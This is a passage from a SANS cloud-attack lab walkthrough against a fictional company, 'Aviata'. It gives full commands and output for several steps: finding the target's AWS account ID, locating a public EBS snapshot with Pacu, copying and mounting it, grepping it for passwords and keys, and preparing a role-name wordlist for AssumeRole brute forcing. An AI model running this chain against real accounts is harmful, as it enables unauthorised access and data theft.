SANS Cloud Curriculum - 2024 Workshop Series
Aviata Solo Flight Challenge - Chapter 1
System Requirements
This workshop requires the following software and resources:
- An x86-based system capable of running Docker Engine or Docker Desktop.
- Terraform version 1.6 or higher
- A web browser
- Your own AWS account, which we will refer to as the attacker account.
- An IAM access key that can create IAM policies, roles, and other resources in that attacker account. If you use named profiles, please make note of them.
- A local clone of the workshop repository: https://github.com/sans-sec588/sec588-workshop-containers-ace135.
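For example, a typical way to get a local copy (assuming you are cloning over HTTPS with git installed) looks like this:
Command lines
git clone https://github.com/sans-sec588/sec588-workshop-containers-ace135.git
cd sec588-workshop-containers-ace135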
Setup
To begin this workshop you will run Terraform in your OWN AWS account, which we refer to as the attacker account. The structure of this repository is as follows:
- By running start.sh you build the container for this workshop. Congratulations!
- The terraform directory is for your attacker account. What does it do? It creates an IAM role called s3-searcher with all of the various permissions needed to attack the individual target accounts.
- Finally, there is the tools directory. This is another Docker directory that will be used to build your attacker tools.
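If it helps to orient yourself, a minimal first pass through the repository might look like the sketch below; it assumes start.sh sits at the repository root and is executable, so adjust the paths if your checkout differs.
Command lines
cd sec588-workshop-containers-ace135
ls          # expect to see start.sh, terraform/, tools/, and build-directory/
./start.sh  # builds the workshop container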
Bonus Content
Bonus: You will also find a directory called build-directory. The README.md in that directory will allow you to build the target environment in your own AWS account. The only thing you must be aware of is that the target and attacker accounts must be DIFFERENT or the labs will not work; use the build-directory Terraform in your target account. This directory will NOT be used for this workshop.
Running the Terraform script
-
For those who need to build out their role, run the Terraform configuration in the terraform directory using the following commands. First, we will move into the directory and create the terraform.tfvars file. For reference, an example terraform.tfvars.example file is provided.
Danger
Please note that these steps are shown from the point of view of a Unix workstation and use self-referencing paths. Your paths will be different on your local system. When you create the terraform.tfvars file, you must change the profile and region settings to reflect your environment.
Command lines
cd terraform
Command lines
cat << EOF > terraform.tfvars
profile = "default"
region = "us-east-2"
EOF
-
Once this is complete, you can then run the terraform init and apply commands.
Command lines
terraform init
Command lines
terraform apply
Example Results
data.aws_caller_identity.current: Reading... data.aws_caller_identity.current: Read complete after 0s [id=3[REDACTED]8] Terraform used the selected providers to generate the following execution plan. Resource actions are indicated with the following symbols: + create Terraform will perform the following actions: # aws_iam_policy.s3_searcher_policy will be created + resource "aws_iam_policy" "s3_searcher_policy" { + arn = (known after apply) + description = "SEC588 Container Lab Searcher Policy" + id = (known after apply) + name = "s3-searcher" + name_prefix = (known after apply) + path = "/" + policy = jsonencode( { + Statement = [ + { + Action = "s3:GetObject" + Effect = "Allow" + Resource = "arn:aws:s3:::*/*" + Sid = "VisualEditor0" }, + { + Action = "s3:ListBucket" + Effect = "Allow" + Resource = "arn:aws:s3:::*" + Sid = "VisualEditor1" }, ] + Version = "2012-10-17" } ) + policy_id = (known after apply) + tags_all = (known after apply) } # aws_iam_role.s3_searcher will be created + resource "aws_iam_role" "s3_searcher" { + arn = (known after apply) + assume_role_policy = jsonencode( { + Statement = [ + { + Action = "sts:AssumeRole" + Condition = {} + Effect = "Allow" + Principal = { + AWS = "3[REDACTED]8" } }, ] + Version = "2012-10-17" } ) + create_date = (known after apply) + force_detach_policies = false + id = (known after apply) + managed_policy_arns = (known after apply) + max_session_duration = 3600 + name = "s3-searcher" + name_prefix = (known after apply) + path = "/" + tags_all = (known after apply) + unique_id = (known after apply) } # aws_iam_role_policy_attachment.s3_searcher will be created + resource "aws_iam_role_policy_attachment" "s3_searcher" { + id = (known after apply) + policy_arn = (known after apply) + role = "s3-searcher" } Plan: 3 to add, 0 to change, 0 to destroy. Changes to Outputs: + final_text = (known after apply) Do you want to perform these actions? Terraform will perform the actions described above. Only 'yes' will be accepted to approve. Enter a value: yes aws_iam_role.s3_searcher: Creating... aws_iam_policy.s3_searcher_policy: Creating... aws_iam_policy.s3_searcher_policy: Creation complete after 1s [id=arn:aws:iam::3[REDACTED]8:policy/s3-searcher] aws_iam_role.s3_searcher: Creation complete after 1s [id=s3-searcher] aws_iam_role_policy_attachment.s3_searcher: Creating... aws_iam_role_policy_attachment.s3_searcher: Creation complete after 0s [id=s3-searcher-20240403171759720000000001] Apply complete! Resources: 3 added, 0 changed, 0 destroyed. Outputs: final_text = <<EOT ------------------------------------------------------------------------------- Role ARN for the first portion of the lab: arn:aws:iam::3[REDACTED]8:role/s3-searcher Command to run for the first portion of the lab: s3-account-search arn:aws:iam::3[REDACTED]8:role/s3-searcher dev.aviata.cloud ------------------------------------------------------------------------------- EOT
Please Read
You may have noticed this line during the run of terraform:
Command to run for the first portion of the lab: s3-account-search arn:aws:iam::3[REDACTED]8:role/s3-searcher bucket-name-here
Please make note of this line because we will be using it during the first portion of the lab.
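If you lose track of that line, you can reprint it later from the terraform directory; final_text is the output name shown in the apply results above.
Command lines
terraform output final_text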
-
With this done we can move on to the attacker portion of the lab.
Setting up our Docker container
-
We have a docker container ready for students to run. Go into the tools directory to build the container:
Command lines
cd tools
Command lines
docker build -t sec588-workshop-container-tools .
Example Results
docker build -t sec588-workshop-container-tools .
[+] Building 0.4s (13/13) FINISHED    docker:desktop-linux
 => [internal] load build definition from Dockerfile  0.0s
 => => transferring dockerfile: 924B  0.0s
 => [internal] load metadata for docker.io/library/debian:bookworm  0.3s
 => [internal] load .dockerignore  0.0s
 => => transferring context: 2B  0.0s
 => [1/8] FROM docker.io/library/debian:bookworm@sha256:e97ee92bf1e11a2de654e9f3da827d8dce32b54e0490ac83bfc65c8706568116  0.0s
 => [internal] load build context  0.0s
[REDACTED DUE TO SPACE]
 => => writing image sha256:216d53c4397cfa2df2389ff8634d7f0298cc94fce705a106e07bc1c2cd08a01a  0.0s
 => => naming to docker.io/sec588-workshop-container-tools  0.0s
-
OPTIONAL: We have now built our container; however, if you would like a prebuilt container, you can also use our pre-built one below:
Command lines
docker pull mosesrenegade/sec588-workshop-container-tools
docker tag mosesrenegade/sec588-workshop-container-tools:latest sec588-workshop-container-tools:latest
-
Within the tools directory, ensure you have a .aws directory with a corresponding credentials file. In this file, you will have the profile that you will use to log in to YOUR AWS account.
Command lines
cd <git-checkout-dir>
mkdir ./tools/.aws
Command Lines
cat << EOF > ./tools/.aws/credentials
[default]
aws_access_key_id = AKIA[REDACTED]
aws_secret_access_key = VM[REDACTED]
EOF
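If you prefer a named profile instead of default, the credentials file uses the same format with your profile name in brackets; the sketch below uses a hypothetical profile called workshop. Remember to pass --profile workshop (or set AWS_PROFILE) on the later aws commands if you go this route.
Command Lines
cat << EOF > ./tools/.aws/credentials
[workshop]
aws_access_key_id = AKIA[REDACTED]
aws_secret_access_key = VM[REDACTED]
EOF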
Instructions
Please follow these instructions to run through the actual workshop portion of the labs.
How to get an account ID from a bucket
-
As a mercenary, you have been tasked with gathering as many internal trade secrets from Aviata as possible. How are they able to get around the world twice with their aircraft? To find out, you need to start by performing careful reconnaissance. Begin with a DNS reconnaissance scan of their infrastructure by looking at their websites.
Danger
Please note that these steps are shown from the point of view of a Unix workstation and use self-referencing paths. Your paths will be different on your local system. When we cd into the tools directory, this is the directory called tools within the git repository you pulled.
Command lines
cd tools
Command lines
docker run --rm -v ${PWD}/.aws:/root/.aws -v ${PWD}/workdir:/root/workdir -it sec588-workshop-container-tools /bin/bash
Command lines
subfinder -d aviata.cloud -o /root/workdir/subfinder.txt
Example Results
sec588-workshop-containers-ace135 $ cd tools
sec588-workshop-containers-ace135/tools $ docker run -v ${PWD}/.aws:/root/.aws -v ${PWD}/workdir:/root/workdir -it sec588-workshop-container-tools /bin/bash
root@588ace135fab:~# subfinder -d aviata.cloud -o /root/workdir/subfinder.txt
[subfinder banner]
projectdiscovery.io
[INF] Current subfinder version v2.6.6 (latest)
[INF] Loading provider config from /root/.config/subfinder/provider-config.yaml
[INF] Enumerating subdomains for aviata.cloud
dev.aviata.cloud
aviata.cloud
[INF] Found 2 subdomains for aviata.cloud in 28 seconds 449 milliseconds
root@588ace135fab:~#
-
We now have a list of sites that we can feed into a tool such as s3scanner, which will tell us which of these sites are S3 buckets or match an S3 bucket location. The s3scanner tool works across clouds, so it is not limited to AWS S3.
Command lines
s3scanner -bucket-file /root/workdir/subfinder.txt
Example Results
root@588ace135fab:~/bin# s3scanner -bucket-file /root/workdir/subfinder.txt
(venv) root@588ace135fab:~/workdir# s3scanner -bucket-file /root/workdir/subfinder.txt
INFO not_exist | aviata.cloud
INFO exists    | dev.aviata.cloud | us-east-2 | AuthUsers: [] | AllUsers: [READ]
-
Do you notice that there is a bucket that has READ access and houses our website? One of the things we can do, thanks to research by many individuals credited below, is figure out exactly what our target account number is. AWS account numbers should be kept secret; however, many times they are not, and instead they are handed out very freely, which can lead to issues as we will see. Recall from the earlier Terraform output that we now have a command string like so: s3-account-search arn:aws:iam::3[REDACTED]8:role/s3-searcher dev.aviata.cloud
Please note that we will need to insert it here, using the name of the bucket we found above.
Command lines
s3-account-search --profile default arn:aws:iam::17[EXAMPLE]3:role/s3-searcher dev.aviata.cloud
Example Results
root@588ace135fab:~# s3-account-search --profile default arn:aws:iam::17[EXAMPLE]3:role/s3-searcher dev.aviata.cloud
Starting search (this can take a while)
found: 3
found: 31
found: 97[
found: 97[E
found: 97[EX
found: 97[EXA
found: 97[EXAM
found: 97[EXAMP
found: 97[EXAMPL
found: 97[EXAMPLE
found: 97[EXAMPLE]
found: 97[EXAMPLE]8
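For context, s3-account-search roughly works by assuming the s3-searcher role with a restricted session policy that uses the s3:ResourceAccount condition key, then testing the account ID one prefix at a time: if S3 access to the bucket still works under a policy limited to account IDs matching a prefix, that prefix is correct. A manual sketch of a single probe is below; the policy and prefix values are illustrative only, and you do not need to run this for the lab.
aws sts assume-role \
  --role-arn arn:aws:iam::17[EXAMPLE]3:role/s3-searcher \
  --role-session-name probe \
  --policy '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"s3:*","Resource":"*","Condition":{"StringLike":{"s3:ResourceAccount":["97*"]}}}]}'
# Using the returned temporary credentials, a successful ListBucket/GetObject against
# dev.aviata.cloud means the account ID starts with 97; an AccessDenied means it does not.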
Snapshots in Accounts
-
We now have our target's account information, but what attacks can we effectively launch with it? That is the more serious question, because these attacks will not be done via brute force; instead, we look for misconfigurations that may or may not exist. The possible attack vectors include:
- Cross Account flaws and misconfigurations
- Publicly accessible items that should be private.
But what items are publicly accessible? EBS snapshots can be made public, AMIs can be made public, and ECR repositories can be made public. Let's use tools to figure this out.
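Pacu automates the snapshot hunt in the next step, but for reference the same kind of check can be done with the plain AWS CLI; a sketch for a single region, using the account ID recovered earlier, might look like this (optional, not required for the lab):
Command lines
aws ec2 describe-snapshots --region us-east-2 \
  --restorable-by-user-ids all \
  --owner-ids 97[EXAMPLE]8 \
  --query 'Snapshots[].SnapshotId'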
-
From within the container, we can run pacu to list EBS snapshots. We need to supply Pacu with our AWS keys, but this is not all that difficult.
Command lines
cd /root/pacu
Command lines
source venv/bin/activate
Command lines
python3 cli.py
Note
You will be asked to create a "session for pacu"; this can be anything you like, and we will use the name aviata.
Command lines
What would you like to name this new session? aviata
Example Results
(venv) root@588ace135fab:~/pacu# python3 cli.py No database found at /root/.local/share/pacu/sqlite.db Database created at /root/.local/share/pacu/sqlite.db ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣶⣿⣿⣿⣿⣿⣿⣶⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⡿⠛⠉⠁⠀⠀⠈⠙⠻⣿⣿⣦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠛⠛⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣷⣀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣤⣤⣤⣤⣤⣤⣤⣤⣀⣀⠀⠀⠀⠀⠀⠀⢻⣿⣿⣿⡿⣿⣿⣷⣦⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣈⣉⣙⣛⣿⣿⣿⣿⣿⣿⣿⣿⡟⠛⠿⢿⣿⣷⣦⣄⠀⠀⠈⠛⠋⠀⠀⠀⠈⠻⣿⣷⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣈⣉⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⣀⣀⣀⣤⣿⣿⣿⣷⣦⡀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣆⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣬⣭⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠛⢛⣉⣉⣡⣄⠀⠀⠀⠀⠀⠀⠀⠀⠻⢿⣿⣿⣶⣄⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠋⣁⣤⣶⡿⣿⣿⠉⠻⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢻⣿⣧⡀ ⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠋⣠⣶⣿⡟⠻⣿⠃⠈⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣿⣧ ⢀⣀⣤⣴⣶⣶⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠁⢠⣾⣿⠉⠻⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿ ⠉⠛⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠀⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⡟ ⠀⠀⠀⠀⠉⣻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⡟⠁ ⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣄⡀⠀⠀⠀⠀⠀⣴⣆⢀⣴⣆⠀⣼⣆⠀⠀⣶⣶⣶⣶⣶⣶⣶⣶⣾⣿⣿⠿⠋⠀⠀ ⠀⠀⠀⣼⣿⣿⣿⠿⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠓⠒⠒⠚⠛⠛⠛⠛⠛⠛⠛⠛⠀⠀⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠀⠀⠀⠀⠀ ⠀⠀⠀⣿⣿⠟⠁⠀⢸⣿⣿⣿⣿⣿⣿⣿⣶⡀⠀⢠⣾⣿⣿⣿⣿⣿⣿⣷⡄⠀⢀⣾⣿⣿⣿⣿⣿⣿⣷⣆⠀⢰⣿⣿⣿⠀⠀⠀⣿⣿⣿ ⠀⠀⠀⠘⠁⠀⠀⠀⢸⣿⣿⡿⠛⠛⢻⣿⣿⡇⠀⢸⣿⣿⡿⠛⠛⢿⣿⣿⡇⠀⢸⣿⣿⡿⠛⠛⢻⣿⣿⣿⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿ ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠸⠿⠿⠟⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿ ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿ ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣧⣤⣤⣼⣿⣿⡇⠀⢸⣿⣿⣧⣤⣤⣼⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿ ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⡿⠃⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢀⣀⣀⣀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿ ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡏⠉⠉⠉⠉⠀⠀⠀⢸⣿⣿⡏⠉⠉⢹⣿⣿⡇⠀⢸⣿⣿⣇⣀⣀⣸⣿⣿⣿⠀⢸⣿⣿⣿⣀⣀⣀⣿⣿⣿ ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⠸⣿⣿⣿⣿⣿⣿⣿⣿⡿⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⡟ ⠀⠀⠀⠀⠀⠀⠀⠀⠘⠛⠛⠃⠀⠀⠀⠀⠀⠀⠀⠘⠛⠛⠃⠀⠀⠘⠛⠛⠃⠀⠀⠉⠛⠛⠛⠛⠛⠛⠋⠀⠀⠀⠀⠙⠛⠛⠛⠛⠛⠉⠀ Version: 1.5.3 What would you like to name this new session? aviata
-
Now that we have pacu running, let's move on to importing our keys. We will use these AWS keys to perform reconnaissance on the target account.
Command lines
import_keys --all
Example Results
Pacu (aviata:No Keys Set) > import_keys --all
Imported keys as "imported-default"
Pacu (aviata:imported-default) >
-
The next step will be for us to run the ebs__enum_snapshots_unauth module, which will use our keys to search for EBS snapshots located within the target organization's account.
Command lines
run ebs__enum_snapshots_unauth --account-id 97[EXAMPLE]8
Example Results
Pacu (workshop:from_default) > run ebs__enum_snapshots_unauth --account-id 97[EXAMPLE]8 Running module ebs__enum_snapshots_unauth... [ebs__enum_snapshots_unauth] Starting region ap-northeast-1... [ebs__enum_snapshots_unauth] Starting region ap-northeast-3... [ebs__enum_snapshots_unauth] Starting region ap-south-1... [ebs__enum_snapshots_unauth] Starting region ap-southeast-2... [ebs__enum_snapshots_unauth] Starting region eu-north-1... [ebs__enum_snapshots_unauth] Starting region eu-west-2... [ebs__enum_snapshots_unauth] Starting region eu-west-3... [ebs__enum_snapshots_unauth] Starting region me-central-1... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region sa-east-1... [ebs__enum_snapshots_unauth] Starting region us-gov-west-1... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region af-south-1... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region ap-northeast-2... [ebs__enum_snapshots_unauth] Starting region ap-south-2... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region ap-southeast-4... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region eu-south-1... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region il-central-1... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region us-east-1... [ebs__enum_snapshots_unauth] Starting region us-east-2... [ebs__enum_snapshots_unauth] [+] Snapshot found: snap-0a[EXAMPLE]2 [ebs__enum_snapshots_unauth] Starting region us-gov-east-1... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region us-west-2... [ebs__enum_snapshots_unauth] Starting region ap-east-1... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region ap-southeast-1... [ebs__enum_snapshots_unauth] Starting region ap-southeast-3... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region ca-central-1... [ebs__enum_snapshots_unauth] Starting region ca-west-1... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region cn-north-1... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region eu-central-2... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region eu-south-2... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region eu-west-1... [ebs__enum_snapshots_unauth] Starting region me-south-1... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region cn-northwest-1... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region eu-central-1... [ebs__enum_snapshots_unauth] Starting region us-west-1... [ebs__enum_snapshots_unauth] ebs__enum_snapshots_unauth completed. [ebs__enum_snapshots_unauth] MODULE SUMMARY: 1 EBS Snapshots found Keyword/AccountId: 97[EXAMPLE]8, SnapshotId: snap-0a[EXAMPLE]2, Region: us-east-2, Description: , OwnerId: 97[EXAMPLE]8, Encrypted: False
-
We have now located a snapshot that appears to have been made public. Given that this is a public snapshot, we want to copy it to our attacker account, where we can mount it as a secondary disk and look within it. Please note that the string:
Keyword/AccountId: 97[EXAMPLE]8, SnapshotId: snap-0a[EXAMPLE]2, Region: us-east-2, Description: , OwnerId: 97[EXAMPLE]8, Encrypted: False
contains the snapshot identifier, which in our example is snap-0a[EXAMPLE]2. Make a note of this and use it in the command below.
Please take note
The following commands will be run in one terminal. Please make sure that you do not close this window. In addition, please make sure that the snapshot ID you copy is NOT THE ONE listed in this guide; YOURS will be UNIQUE.
Command lines
exit
Command lines
aws ec2 copy-snapshot --region us-east-2 --source-region us-east-2 --description "Taken Snapshot" --query 'SnapshotId' --output text --source-snapshot-id snap-0a[EXAMPLE]2
Example Results
Pacu (aviata:imported-default) > exit
(venv) root@588ace135fab:~/pacu# aws ec2 copy-snapshot --region us-east-2 --source-region us-east-2 --description "Taken Snapshot" --query 'SnapshotId' --output text --source-snapshot-id snap-0a[EXAMPLE]2
snap-0e3c953b5afc8746f
Let's now save the Snapshot id as a variable that we will be using in the next step.
Command lines
SnapshotId="snap-0e3c953b5afc8746f"
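The copy can take a little while to become available. If you want to be sure it has finished before launching the instance, one optional way to wait is:
Command lines
aws ec2 wait snapshot-completed --region us-east-2 --snapshot-ids $SnapshotId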
-
Now that we have copied the snapshot, let's mount it in a machine so we can inspect it. First, we will need an AMI that we can use to boot a system; let's use Ubuntu 22.04.
Command lines
AMI=$(aws ec2 describe-images --filters 'Name=name,Values=ubuntu/images/hvm-ssd/ubuntu-jammy-22.04-amd64-server-*' --owners 099720109477 --query 'Images[*].[ImageId,CreationDate]' --region us-east-2 --output text | sort -k2 -r | head -n1 | awk '{ print $1 }')
Next, let's go ahead and create an SSH key-pair for us to use.
Danger
Please run this only once. If you run the command below twice, you will need a different key name, or you will need to delete your key, as you will have lost the private key on disk.
Command lines
aws ec2 create-key-pair --region us-east-2 --key-name attacker-key --query 'KeyMaterial' --output text > /root/workdir/attacker-key.pem
Command lines
chmod 600 /root/workdir/attacker-key.pem
Finally, with all of this in place, we can build a file called mappings.json that will allow us to attach the snapshot as a volume.
Command lines
cat << EOF > /root/workdir/mappings.json
[
  {
    "DeviceName": "/dev/sdh",
    "Ebs": {
      "SnapshotId": "$SnapshotId"
    }
  }
]
EOF
Lastly, let's boot the machine. Please make sure that you retain the Instance ID from the JSON output, and note that this command is shown to you in the Terraform output from the setup; the command below is only for reference.
Command lines
aws ec2 run-instances --image-id $AMI \
  --region us-east-2 \
  --count 1 \
  --instance-type t2.micro \
  --key-name attacker-key \
  --security-group-ids sg-07[EXAMPLE]e \
  --subnet-id subnet-07[EXAMPLE]1 \
  --block-device-mappings file:///root/workdir/mappings.json
Example Results
(venv) root@588ace135fab:~/pacu# AMI=$(aws ec2 describe-images --filters 'Name=name,Values=ubuntu/images/hvm-ssd/ubuntu-jammy-22.04-amd64-server-*' --owners 099720109477 --query 'Images[*].[ImageId,CreationDate]' --region us-east-2 --output text | sort -k2 -r | head -n1 | awk '{ print $1 }') (venv) root@588ace135fab:~/pacu# aws ec2 create-key-pair --region us-east-2 --key-name attacker-key --query 'KeyMaterial' --output text > /root/workdir/attacker-key.pem (venv) root@588ace135fab:~/pacu# cat << EOF > /root/workdir/mappings.json cat << EOF > /root/workdir/mappings.json [ { "DeviceName": "/dev/sdh", "Ebs": { "SnapshotId": "$SnapshotId" } } ] EOF (venv) root@588ace135fab:~/pacu# aws ec2 run-instances --image-id $AMI \ --region us-east-2 \ --count 1 \ --instance-type t2.micro \ --key-name attacker-key \ --security-group-ids sg-07[EXAMPLE]e \ --subnet-id subnet-07[EXAMPLE]1 \ --block-device-mappings file:///root/workdir/mappings.json
-
We will now get the EC2 public IP address to connect to in order to view the contents of the snapshot.
Command lines
export EC2IP=$(aws ec2 describe-instances --query 'Reservations[].Instances[]' --region us-east-2 | jq -r '.[] | select(.State.Name=="running") | select(.KeyName=="attacker-key") | .PublicIpAddress')
echo $EC2IP
The next step will be to log in to our EC2 instance in order to look within the disk; remember, the machine may take a minute or two to start. If the command above gave no output, the machine is not ready; wait about 30 seconds and try again.
Command Lines
ssh -i /root/workdir/attacker-key.pem ubuntu@$EC2IP
Example Results
(venv) root@588ace135fab:~/pacu# ssh -i /root/workdir/attacker-key.pem ubuntu@$EC2IP The authenticity of host '18.226.88.65 (18.226.88.65)' can't be established. ED25519 key fingerprint is SHA256:QkbePxcv5PsCdkL52yCAUb1MATMV/ivu5VwWilHl7s4. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '18.226.88.65' (ED25519) to the list of known hosts. Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 6.5.0-1017-aws x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/pro System information as of Sat Apr 13 08:57:11 UTC 2024 System load: 0.40087890625 Processes: 102 Usage of /: 20.8% of 7.57GB Users logged in: 0 Memory usage: 21% IPv4 address for eth0: 10.1.0.13 Swap usage: 0% Expanded Security Maintenance for Applications is not enabled. 0 updates can be applied immediately. Enable ESM Apps to receive additional future security updates. See https://ubuntu.com/esm or run: sudo pro status To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details. ubuntu@ip-10-1-0-224:~$
-
Notice that the prompt changes from your container's (venv) prompt to the ubuntu@ prompt, as we are now in our attacker VM in the cloud. The next part will be to mount the disk and look for any sources of information we can find.
Command Lines
sudo mount /dev/xvdh /mnt
Command Lines
cd /mnt
Example Results
ubuntu@ip-10-1-0-224:~$ sudo mount /dev/xvdh /mnt
ubuntu@ip-10-1-0-224:~$ cd /mnt
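If the mount complains that /dev/xvdh does not exist (some instance types expose EBS volumes as NVMe devices with different names), list the block devices and mount whichever extra, non-root disk corresponds to the copied snapshot. This is a troubleshooting aside, not a required lab step.
Command Lines
lsblk
# if the disk shows up as, for example, /dev/nvme1n1 instead of /dev/xvdh:
# sudo mount /dev/nvme1n1 /mnt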
-
Now let's explore the system. There are many ways to do this, including:
- Using grep
- Using find
- Looking in well-known locations such as /etc, /home, /root, /opt, and others
Let's look at some of those well-known locations inside the /mnt directory.
Command Lines
ls /mnt/
Example Results
ubuntu@ip-10-1-0-224:/mnt$ ls /mnt/
bin  boot  dev  etc  home  lib  lost+found  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
ubuntu@ip-10-1-0-224:/mnt$
Did you notice a directory called 'opt'? Maybe there is valuable information in the files in there.
Command Lines
find /mnt/opt -type f
Command Lines
cat /mnt/opt/aviata/data/plans
Example Results
ubuntu@ip-10-1-0-224:/mnt$ find /mnt/opt -type f
/mnt/opt/aviata/data/plans
ubuntu@ip-10-1-0-224:/mnt$ cat /mnt/opt/aviata/data/plans
You think you found the plans to Aviata? Maybe you should stay tuned to sans.org/ace135 and find out whats next...
You can use cat, grep, or other tools to explore the snapshot more if you wish.
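For example, a quick (and fairly noisy) sweep for interesting strings across the usual locations could look like the following; the search terms are only suggestions.
Command Lines
sudo grep -ril "password\|secret\|aws_access_key" /mnt/etc /mnt/home /mnt/root /mnt/opt 2>/dev/null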
-
Let's now leave our Virtual Machine and return to our container.
Command Lines
exit
AssumeRole attacks
-
From within our container, we are going to run one more command set; this time we are going to show you the dangers of AssumeRole in AWS. We can create a wordlist of potential names that Aviata could use for roles in their environment. This is just guesswork, but there are several naive ways to obtain role names:
- Documented vendor role names
- AWS documented role names
Any one of these sources may be able to provide us with what we need for this attack.
Command Lines
cat << EOF > /root/workdir/wordlist.txt
aviata
aviata-cloud
EOF
Example Output
(venv) root@588ace135fab:~/pacu# cat << EOF > /root/workdir/wordlist.txt
aviata
aviata-cloud
EOF
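If you experiment beyond the lab, the wordlist can be extended with other commonly seen role names; the additions below are generic examples and are not names used by this workshop.
Command Lines
cat << EOF >> /root/workdir/wordlist.txt
admin
deploy
OrganizationAccountAccessRole
EOF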
-
With this wordlist, what could we do? We could use pacu to brute force and enumerate roles. Let's move back into pacu. First, go into the pacu directory.
Command Lines
